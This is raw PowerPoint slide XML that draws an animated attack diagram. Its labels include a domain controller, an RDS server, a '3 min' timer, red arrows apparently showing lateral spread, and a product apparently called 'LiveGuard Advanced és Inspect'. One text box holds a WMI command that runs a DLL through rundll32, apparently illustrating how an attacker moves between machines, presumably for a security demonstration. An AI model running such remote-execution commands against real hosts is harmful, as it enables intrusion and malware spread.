          </a:xfrm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7746485C-049D-4B83-DADC-DA9AD6788B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p:blipFill>
          <p:spPr>
            <a:xfrm rot="15438576">
              <a:off x="1801945" y="1877593"/>
              <a:ext cx="1017278" cy="1037224"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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957576DF-5057-CF40-4790-E5BDA8C87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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510382" y="2185592"/>
              <a:ext cx="1031059" cy="1258498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AA9CE77-1A25-5CAE-7FEB-1CA588C1AB6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2091611" y="3357659"/>
            <a:ext cx="1436768" cy="790080"/>
            <a:chOff x="2063793" y="3080369"/>
            <a:chExt cx="1436768" cy="790080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Graphic 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E6307BA-4482-19FE-AEAB-C1421B356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2063793" y="3080369"/>
              <a:ext cx="836602" cy="788103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:glow rad="431800">
                <a:schemeClr val="tx2">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="Graphic 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AEE964-3592-B014-086B-250A78808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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2935143" y="3082291"/>
              <a:ext cx="565418" cy="788158"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:glow rad="431800">
                <a:schemeClr val="tx2">
                  <a:alpha val="70000"/>
                </a:schemeClr>
              </a:glow>
            </a:effectLst>
          </p:spPr>
        </p:pic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30C2283-7A59-D874-C8D0-4ED49761B50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4505217" y="1473682"/>
            <a:ext cx="1055263" cy="1064643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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B1A89E65-4C90-3E57-4E3B-DF2521690A5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0990" y="2590452"/>
            <a:ext cx="5748401" cy="67717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6392260" y="0"/>
            <a:ext cx="189574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57414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C6982-61BA-BA30-6BB2-21DB978F5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0152A81-0FE1-D16C-E076-2A8AFC39BEC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5702299" y="1461299"/>
            <a:ext cx="12118307" cy="827646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0283F5-AD1F-12FA-3BFC-AE682A128915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435715" y="1697956"/>
            <a:ext cx="1982799" cy="2710087"/>
            <a:chOff x="4596105" y="4160260"/>
            <a:chExt cx="1982799" cy="2710087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5AD18035-277C-9E47-A00C-945AF870D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4857524" y="4160260"/>
              <a:ext cx="1459963" cy="196648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B756340-2DAB-7E5D-466E-E4E1F5FBBE52}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4596105" y="6039350"/>
              <a:ext cx="1982799" cy="830997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  <a:t>Domain</a:t>
              </a:r>
              <a:b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</a:br>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="424D56"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Controller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CB8E56B8-886F-B07A-DEBB-2761C7EA70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267200" y="266700"/>
            <a:ext cx="9753600" cy="97536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AF6BD28F-CAB1-4DC4-8B08-43F41452002C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6067249" y="4223963"/>
            <a:ext cx="1459963" cy="2338580"/>
            <a:chOff x="6067249" y="4223963"/>
            <a:chExt cx="1459963" cy="233858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4F34D93-CAE0-0DCC-8F60-0AD02E0D40FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6067249" y="4223963"/>
              <a:ext cx="1459963" cy="2338580"/>
              <a:chOff x="4857524" y="4160260"/>
              <a:chExt cx="1459963" cy="2338580"/>
            </a:xfrm>
          </p:grpSpPr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91D9706A-AE0E-B04D-0B1D-660D50DE86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4857524" y="4160260"/>
                <a:ext cx="1459963" cy="1966480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8E7492D-F00B-C328-57BF-A8826B2057C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4957545" y="6037175"/>
                <a:ext cx="1259919" cy="461665"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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424D56"/>
                    </a:solidFill>
                    <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>RDS</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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FA635EF7-94A7-37D3-6965-07503787D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607916" y="5553702"/>
              <a:ext cx="464482" cy="566940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7A577877-781C-13C3-4813-EDAA4E9998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987994" y="7385041"/>
            <a:ext cx="1459963" cy="1966481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B845D0B2-DD38-87B0-CE93-9797B824E8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6440972" y="7385042"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="6440972" y="7385042"/>
            <a:chExt cx="1459963" cy="1966481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2983BDF4-74E6-841E-1F7A-4DD871534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440972" y="7385042"/>
              <a:ext cx="1459963" cy="1966481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C06FF0E9-78F4-E717-2764-9980A29A4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999429" y="8084811"/>
              <a:ext cx="464482" cy="56694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162BE1C-8E36-A28E-6A4D-A83E3761027A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8214483" y="7385041"/>
            <a:ext cx="1459963" cy="1966481"/>
            <a:chOff x="8214483" y="7385041"/>
            <a:chExt cx="1459963" cy="1966481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1998F2FC-5439-29A6-CCC9-424EA922B1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8214483" y="7385041"/>
              <a:ext cx="1459963" cy="1966481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0B4F3B55-6DB6-4765-163B-AD3333F61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8760513" y="8084811"/>
              <a:ext cx="464482" cy="5669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0465F60-936F-9663-BE26-1D38BB7361AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11858362" y="7205476"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="11858362" y="7205476"/>
            <a:chExt cx="1652602" cy="110173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41C6F1CF-A42F-8F66-84F9-94BF2DEC5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11858362" y="7205476"/>
              <a:ext cx="1652602" cy="1101734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2DE608C8-83D0-D22D-C1B0-ACE0BCCED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2446684" y="7472873"/>
              <a:ext cx="464482" cy="56694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A08DA5A-4A05-A257-D7C2-5E1262601DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13583252" y="6562543"/>
            <a:ext cx="1652602" cy="1101734"/>
            <a:chOff x="13583252" y="6562543"/>
            <a:chExt cx="1652602" cy="1101734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C904FFA4-C92A-1332-CBF9-FC707F8AE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13583252" y="6562543"/>
              <a:ext cx="1652602" cy="1101734"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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CB1005D0-8DB7-775B-05C6-F9A242BD8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4177312" y="6829940"/>
              <a:ext cx="464482" cy="5669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CDC4CC0-3992-2774-9EB3-B6EC17119DC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055789" y="4694334"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15055789" y="4694334"/>
            <a:chExt cx="1729827" cy="1585675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FC5D1066-06AF-46D1-BC7A-5E4C5F4DDC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5055789" y="4694334"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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D54E5B86-D005-066E-834F-6DFC8FB91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5533037" y="5407540"/>
              <a:ext cx="464482" cy="56694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39EA219-1F92-380A-5472-2DD9F6776AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15421521" y="2099717"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="15421521" y="2099717"/>
            <a:chExt cx="1729827" cy="1585675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F8AC13C6-C130-8A1E-BEC7-A4493F59B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5421521" y="2099717"/>
              <a:ext cx="1729827" cy="1585675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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8033EB18-86F1-5403-BCEB-FBCB81543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5896053" y="2823564"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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276C79-38A4-7708-EB13-FD349FEB859F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6848475" y="2676525"/>
            <a:ext cx="2576513" cy="2508250"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="4318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8C62573-DBE2-C044-31D2-F8D80C5C60C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13286213" y="3199706"/>
            <a:ext cx="1729827" cy="1585675"/>
            <a:chOff x="13286213" y="3199706"/>
            <a:chExt cx="1729827" cy="1585675"/>
          </a:xfrm>
        </p:grpSpPr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7589CBAE-B14A-4F3F-3E78-CD87CBD08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13286213" y="3199706"/>
              <a:ext cx="1729827" cy="1585675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5FBA842E-A189-D397-E36B-664D54DB6A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3778328" y="3922114"/>
              <a:ext cx="464482" cy="566940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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039AA356-2F4E-1AAD-D86E-588C392932ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2016600" y="1149179"/>
            <a:ext cx="14833600" cy="636529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88900">
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="66000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:glow rad="584200">
              <a:schemeClr val="tx2">
                <a:alpha val="73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glow rad="190500">
                    <a:schemeClr val="tx2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WMI:&gt; %WINDIR%\syswow64\rundll32.exe c:\windows\COMPANY_c.dll,VisibleEntry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FE43619-8004-064A-4F26-636DD50872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429227" y="5336491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593A10B0-949A-81AD-4485-2DEA8E71C72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815646" y="7896095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27FEA4EB-EEED-FE2A-6222-21166C7124E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574453" y="7913158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09311737-9D58-E8E3-CCE9-B7BF556173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0304059" y="7896096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8E394D23-2D0B-A4F0-84D1-CBB326304CF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2260624" y="7266323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65A53DAE-3457-D750-C3FE-2C55E338E62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3989703" y="6623390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67880DD8-328C-50B6-7F42-57177F0D761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5340870" y="5265354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509E5DE3-A470-92D1-0B8A-B20B7F0433E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3606570" y="3770225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A4F23DB9-BFFA-B498-7ED8-88EC82011B4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5695229" y="2675036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34707369-825A-F8F2-C81F-4DDE0835DA0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9059154" y="2317462"/>
            <a:ext cx="836602" cy="788103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B9B25605-34BD-0301-20CA-79321FE430D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8628233" y="5028108"/>
            <a:ext cx="1266949" cy="963595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  <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Graphic 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2343A018-554E-0E7D-FD93-34B2DC65B8D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379874" y="7459200"/>
            <a:ext cx="2430121" cy="1886916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="431800">
              <a:schemeClr val="tx2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst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7717B01E-7361-6D35-E223-EE2F73F29F7F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2809995" y="5206520"/>
            <a:ext cx="4003767" cy="3196138"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="40894">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dashDot"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="431800">
              <a:schemeClr val="tx2">
                <a:alpha val="7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loud 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55DE4220-C3D9-7C1F-74DB-45C0C715668B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31587" y="893179"/>
            <a:ext cx="5938658" cy="3944499"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="15000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>LiveGuard Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>és</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="127000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="90000"/>
                    </a:schemeClr>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Inspect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D38C5A6-B10F-6365-C22F-EAB0BF6CDE3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="626899" y="1597348"/>
            <a:ext cx="1123002" cy="980752"/>
            <a:chOff x="1791972" y="1887566"/>
            <a:chExt cx="1749469" cy="1556524"/>
          </a:xfrm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8AEC4DE6-DC9C-AF9D-B2E1-5597D6AE8D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p:blipFill>
          <p:spPr>
            <a:xfrm rot="15438576">
              <a:off x="1801945" y="1877593"/>
              <a:ext cx="1017278" cy="1037224"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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065A17D4-3831-B95B-644E-118FF7DA0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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510382" y="2185592"/>
              <a:ext cx="1031059" cy="1258498"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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36EBE1C1-BD56-CB77-4382-44CFCA1ABDE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4505217" y="1473682"/>
            <a:ext cx="1055263" cy="1064643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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FC9D186F-B6AC-BEDE-4102-6BA2D410528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1136652" y="2921796"/>
            <a:ext cx="716207" cy="879912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2D2881F3-3EEE-79C7-7402-1EA6E20935C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935770" y="3746909"/>
            <a:ext cx="1117970" cy="47705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ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003C41"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>3 min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ECC0501-E7A0-94D5-00E2-1FA683BF84D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828299" y="2179430"/>
            <a:ext cx="482703" cy="417021"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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CE1B110F-59A6-D46D-B734-07388DA063CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2566882" y="2621851"/>
            <a:ext cx="648993" cy="26993"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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DA1A54E9-06A3-AB22-3841-710BAA9ACA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604982" y="2519363"/>
            <a:ext cx="648993" cy="100906"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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1FEA1A22-A7DF-60B8-D073-27859F067275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651810" y="2361734"/>
            <a:ext cx="602165" cy="234717"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8032AA-3403-A855-0C1D-0F21F1964638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2604982" y="2488541"/>
            <a:ext cx="629582" cy="140009"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB5A12CD-3E5E-CB6A-C6F0-06D13FC9A092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706099" y="2281412"/>
            <a:ext cx="547876" cy="296688"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67909A5B-3870-517F-ABD9-DEE86EB72EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2853998" y="2119699"/>
            <a:ext cx="413560" cy="425511"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln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E9848976-C788-6631-972F-8B8B0E587CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2990850" y="2013205"/>
            <a:ext cx="298003" cy="482340"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="34925">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="127000">
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
                <a:alpha val="9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9" name="Rectangle 288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEE3E8EB-0F5B-7D8F-C783-714969440AC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1383147">
            <a:off x="2420980" y="2172287"/>
            <a:ext cx="964088" cy="7431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Rectangle 289">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F265AFC-6952-019C-F9E9-776283F2CF85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570102" y="1812882"/>
            <a:ext cx="964088" cy="7431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08B4ABA8-C598-A24E-FA20-B466D1B5B364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379558" y="2631725"/>
            <a:ext cx="100911" cy="104783"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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127000">
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff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Graphic 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8548B4CF-C2D4-D154-9F68-E04A63AC917E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 flipH="1">
            <a:off x="2019074" y="2294745"/>
            <a:ext cx="2152649" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Oval 292">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{339D51EC-96A7-775C-8755-8F0EA2EB04EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3410932" y="2669829"/>
            <a:ext cx="45719" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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63500">
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
                <a:alpha val="9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6392260" y="802"/>
            <a:ext cx="189574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1537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repeatCount="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42" presetClass="path" presetSubtype="0" accel="1000" decel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3889E-6 4.81481E-6 L 0.18429 0.29907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45" y="1479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xit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decel="1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2.91667E-6 -2.83951E-6 L 0.69575 0.04167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83" y="208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xit" presetSubtype="8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1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decel="1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3.75E-6 4.32099E-6 L 0.57864 0.14228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32" y="7114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22" presetClass="exit" presetSubtype="8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3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1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2" presetClass="path" presetSubtype="0" decel="1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1.66667E-6 6.17284E-7 L 0.60278 0.425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39" y="2125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22" presetClass="exit" presetSubtype="8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4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1" presetClass="exit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decel="1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4.58333E-6 4.5679E-6 L 0.67717 0.28966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54" y="14475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22" presetClass="exit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5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path" presetSubtype="0" decel="1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4.02778E-6 -1.11111E-6 L 0.50695 0.48904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47" y="24444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22" presetClass="exit" presetSubtype="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6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2" presetClass="path" presetSubtype="0" decel="1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11111E-6 2.46914E-6 L 0.30486 0.55478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43" y="27731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22" presetClass="exit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3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path" presetSubtype="0" decel="1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-1.38889E-6 4.19753E-6 L 0.20755 0.5591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73" y="27948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22" presetClass="exit" presetSubtype="8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8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1" presetClass="exit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2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="3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2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="3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" grpId="0" animBg="1"/>
      <p:bldP spid="292" grpId="1" animBg="1"/>
      <p:bldP spid="292" grpId="2" animBg="1"/>
      <p:bldP spid="293" grpId="0" animBg="1"/>
